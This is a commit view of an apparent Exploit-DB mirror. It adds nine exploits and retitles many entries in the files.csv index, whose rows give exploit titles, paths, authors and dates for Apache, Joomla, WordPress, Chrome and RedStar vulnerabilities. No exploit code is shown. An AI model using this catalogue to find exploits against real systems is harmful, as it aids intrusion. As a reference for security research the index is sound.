bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-20

Browse source 
9 new exploits

Apache 2.2 - (Windows) Local Denial of Service
Apache 2.2 (Windows) - Local Denial of Service

Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service
Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service

Apache 2.4.7 mod_status - Scoreboard Handling Race Condition
Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition

Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read

Apache 1.3.31 mod_include - Local Buffer Overflow
Apache 1.3.31 (mod_include) - Local Buffer Overflow

Gopher 3.0.9 - (+VIEWS) Remote Client Side Buffer Overflow
Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow

Apache 'Mod_Auth_OpenID' - Session Stealing
Apache (Mod_Auth_OpenID) - Session Stealing
Apache 2.0.4x mod_php Module - File Descriptor Leakage (1)
Apache 2.0.4x mod_php Module - File Descriptor Leakage (2)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)

Apache 2.0.4x mod_perl Module - File Descriptor Leakage (3)
Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)

Apache 1.3.x mod_include - Local Buffer Overflow
Apache 1.3.x (mod_include) - Local Buffer Overflow

Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution
RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)
Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download

Apache 1.3.x mod_mylo - Remote Code Execution
Apache 1.3.x (mod_mylo) - Remote Code Execution

Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure
Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure

Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (2)
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray

Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting
Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting

Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit
Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit

Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)
Apache (Windows x86) - Chunked Encoding (Metasploit)

Apache mod_proxy - Reverse Proxy Exposure (PoC)
Apache (mod_proxy) - Reverse Proxy Exposure (PoC)

Apache 1.3.20 - Win32 PHP.exe Remote File Disclosure
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure

Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)

Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)
Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)

Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting
Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting

Apache 7.0.x 'mod_proxy'- Reverse Proxy Security Bypass
Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass

Apache 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass
Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass

Apache 'mod_wsgi' Module - Information Disclosure
Apache (mod_wsgi) - Information Disclosure

Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection
Joomla! Component JP Jobs 1.4.1 - SQL Injection

Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion
Joomla! Component Picasa 2.0 - Local File Inclusion

Joomla! Component 'com_jinventory' - Local File Inclusion
Joomla! Component JInventory 1.23.02 - Local File Inclusion

Joomla! Component 'com_loginbox' - Local File Inclusion
Joomla! Component LoginBox - Local File Inclusion

Joomla! Component 'com_Joomlaupdater' - Local File Inclusion
Joomla! Component Magic Updater - Local File Inclusion
Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion
Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection
Joomla! Component News Portal 1.5.x - Local File Inclusion
Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' Parameter SQL Injection
Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion
Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion
Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion
Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion
Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion
Joomla! Component 'com_datafeeds' 880 - Local File Inclusion
Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
Joomla! Component Juke Box 1.7 - Local File Inclusion
Joomla! Component Joomla Flickr 1.0 - Local File Inclusion
Joomla! Component Highslide 1.5 - Local File Inclusion
Joomla! Component Fabrik 2.0 - Local File Inclusion
Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion
Joomla! Component 'com_javoice' - Local File Inclusion
Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
Joomla! Component JA Voice 2.0 - Local File Inclusion
Joomla! Component 'com_jfeedback' - Local File Inclusion
Joomla! Component 'com_jprojectmanager' - Local File Inclusion
Joomla! Component Jfeedback 1.2 - Local File Inclusion
Joomla! Component JProject Manager 1.0 - Local File Inclusion

Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection
Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection

Joomla! Component 'com_horoscope' - Local File Inclusion
Joomla! Component Horoscope 1.5.0 - Local File Inclusion

Joomla! Component 'com_market' - Local File Inclusion
Joomla! Component Online Market 2.x - Local File Inclusion
Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection
Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection
Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection
Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection
Joomla! Component 'com_mtfireeagle' - Local File Inclusion
Joomla! Component 'com_mediamall' - Blind SQL Injection
Joomla! Component 'com_lovefactory' - Local File Inclusion
Joomla! Component 'com_jacomment' - Local File Inclusion
Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
Joomla! Component Love Factory 1.3.4 - Local File Inclusion
Joomla! Component JA Comment - Local File Inclusion

Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection
Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection

Joomla! Component 'com_joltcard' - SQL Injection
Joomla! Component JoltCard 1.2.1 - SQL Injection
Joomla! Component 'com_gadgetfactory' - Local File Inclusion
Joomla! Component 'com_matamko' - Local File Inclusion
Joomla! Component 'com_multiroot' - Local File Inclusion
Joomla! Component 'com_multimap' - Local File Inclusion
Joomla! Component 'com_drawroot' - Local File Inclusion
Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
Joomla! Component Matamko 1.01 - Local File Inclusion
Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion

Joomla! Component 'com_if_surfalert' - Local File Inclusion
Joomla! Component iF surfALERT 1.2 - Local File Inclusion

Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection
Joomla! Component GBU Facebook 1.0.5 - SQL Injection
Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection
Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection
Joomla! Component Online News Paper Manager 1.0 - 'cid' Parameter SQL Injection
Joomla! Component JTM Reseller 1.9 Beta - SQL Injection

Joomla! Component 'com_mmsblog' - Local File Inclusion
Joomla! Component MMS Blog 2.3.0 - Local File Inclusion

Joomla! Component 'com_noticeboard' - Local File Inclusion
Joomla! Component NoticeBoard 1.3 - Local File Inclusion

Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion
Joomla! Component Graphics 1.0.6 - Local File Inclusion

Joomla! Component 'com_newsfeeds' - SQL Injection
Joomla! Component Newsfeeds - SQL Injection

Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection
Joomla! Component Komento 1.0.0 - 'sid' Parameter SQL Injection

Joomla! Component 'com_dioneformwizard' - Local File Inclusion
Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion

Joomla! Component 'com_jejob' 1.0 - Local File Inclusion
Joomla! Component JE Job 1.0 - Local File Inclusion

Joomla! Component 'com_jequoteform' - Local File Inclusion
Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion

Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion
Joomla! Component MS Comment 0.8.0b - Local File Inclusion

Apache Axis2 Administration console - Authenticated Cross-Site Scripting
Apache Axis2 Administration Console - Authenticated Cross-Site Scripting

Joomla! Component 'com_mycar' - Multiple Vulnerabilities
Joomla! Component My Car 1.0 - Multiple Vulnerabilities

Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection
Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection

Joomla! Component 'com_jsjobs' - SQL Injection
Joomla! Component JS Jobs 1.0.5.8 - SQL Injection

Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities
Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities

Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection
Joomla! Component Gamesbox 1.0.2 - 'id' Parameter SQL Injection

Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection
Joomla! Component eventCal 1.6.4 - Blind SQL Injection

Joomla! Component 'com_ninjamonials' - Blind SQL Injection
Joomla! Component NinjaMonials - Blind SQL Injection

Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection
Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Parameter Blind SQL Injection
Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection
Joomla! Component 'com_huruhelpdesk' - SQL Injection
Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection
Joomla! Component Huru Helpdesk - SQL Injection

Joomla! Component 'com_joomdle' 0.24 - SQL Injection
Joomla! Component Joomdle 0.24 - SQL Injection

Joomla! Component 'com_Joomla-visites' - Remote File Inclusion
Joomla! Component Visites 1.1 RC2 - Remote File Inclusion

Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection
Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection

Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion
Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion

Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection
Joomla! Component Gantry 3.0.10 - Blind SQL Injection

Joomla! Component 'com_jphone' - Local File Inclusion
Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion

Joomla! Component 'com_jgen' - SQL Injection
Joomla! Component JGen 0.9.33 - SQL Injection

Joomla! Component 'com_ezautos' - SQL Injection
Joomla! Component Joostina - SQL Injection

Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities
Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities

Joomla! Component 'com_jedirectory' - SQL Injection
Joomla! Component JE Directory 1.0 - SQL Injection

Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities
Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities

Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar - SQL Injection

Joomla! Component 'com_flipwall' - SQL Injection
Joomla! Component Pulse Infotech Flip Wall - SQL Injection

Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection
Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection
Joomla! Component 'com_jsupport' - Cross-Site Scripting
Joomla! Component 'com_jsupport' - SQL Injection
Joomla! Component JSupport 1.5.6 - Cross-Site Scripting
Joomla! Component JSupport 1.5.6 - SQL Injection

Joomla! Component 'com_jimtawl' - Local File Inclusion
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion

phpMyAdmin - Client Side Code Injection / Redirect Link Falsification
phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification

Joomla! Component 'com_jeauto' 1.0 - SQL Injection
Joomla! Component JE Auto 1.0 - SQL Injection

Joomla! Component 'com_jradio' - Local File Inclusion
Joomla! Component JRadio - Local File Inclusion

Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion
Joomla! Component JotLoader 2.2.1 - Local File Inclusion

Joomla! Component 'com_hmcommunity' - Multiple Vulnerabilities
Joomla! Component HM Community - Multiple Vulnerabilities

Joomla! Component 'com_estateagent' - SQL Injection
Joomla! Component Estate Agent - SQL Injection

EPortfolio 1.0 - Client Side Input Validation
EPortfolio 1.0 - Client-Side Input Validation

ActiveWeb Contentserver 5.6.2929 CMS - Client Side Filtering Bypass
ActiveWeb Contentserver 5.6.2929 CMS - Client-Side Filtering Bypass
Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting
Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection
Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting
Joomla! Component JV Comment 3.0.2 - 'id' Parameter SQL Injection

Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting
Joomla! Component JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting

Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection
Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection

Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion
Joomla! Component Jstore - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection
Joomla! Component ECommerce-WD 1.2.5 - SQL Injection

Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection
Joomla! Component Contact Form Maker 1.0.1 - SQL Injection

Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities
Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection
ntop-ng 2.5.160805 - Username  Enumeration
This commit is contained in:
Offensive Security 2016-12-20 05:01:16 +00:00
parent 50a756ae83
commit 62dddb2f49
12 changed files with 808 additions and 118 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

241
files.csv
View file

@ -1762,7 +1762,7 @@ id,file,description,date,author,platform,type,port
15297,platforms/windows/dos/15297.txt,"Microsoft Windows Mobile 6.1 / 6.5 - Double-Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0
15305,platforms/windows/dos/15305.pl,"RarmaRadio 2.53.1 - '.m3u' Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos,0
15306,platforms/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
@ -2736,7 +2736,7 @@ id,file,description,date,author,platform,type,port
22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0
22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0
22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
@ -4297,7 +4297,7 @@ id,file,description,date,author,platform,type,port
34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0
34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0
@ -5318,6 +5318,7 @@ id,file,description,date,author,platform,type,port
40929,platforms/osx/dos/40929.py,"Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service",2016-12-16,LiquidWorm,osx,dos,0
40933,platforms/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,windows,dos,0
40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0
40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5455,7 +5456,7 @@ id,file,description,date,author,platform,type,port
560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0
600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0
601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0
@ -5573,7 +5574,7 @@ id,file,description,date,author,platform,type,port
1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - (ld.so.1) Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0
1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client Side Buffer Overflow",2005-08-30,vade79,linux,local,0
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0
1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0
@ -6911,7 +6912,7 @@ id,file,description,date,author,platform,type,port
18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
18917,platforms/linux/local/18917.txt,"Apache 'Mod_Auth_OpenID' - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0
@ -7808,11 +7809,11 @@ id,file,description,date,author,platform,type,port
23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0
23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0
23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php Module - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php Module - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0
23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
@ -7878,7 +7879,7 @@ id,file,description,date,author,platform,type,port
24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0
24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0
24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0
@ -8227,6 +8228,7 @@ id,file,description,date,author,platform,type,port
34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0
34037,platforms/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win_x86,local,0
40936,platforms/linux/local/40936.html,"Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution",2016-12-18,"Hacker Fantastic",linux,local,0
34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0
34167,platforms/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local,0
@ -8714,6 +8716,9 @@ id,file,description,date,author,platform,type,port
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
40921,platforms/linux/local/40921.sh,"Nagios < 4.2.4 - Privilege Escalation",2016-12-15,"Dawid Golunski",linux,local,0
40931,platforms/multiple/local/40931.txt,"iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",multiple,local,0
40937,platforms/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",linux,local,0
40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
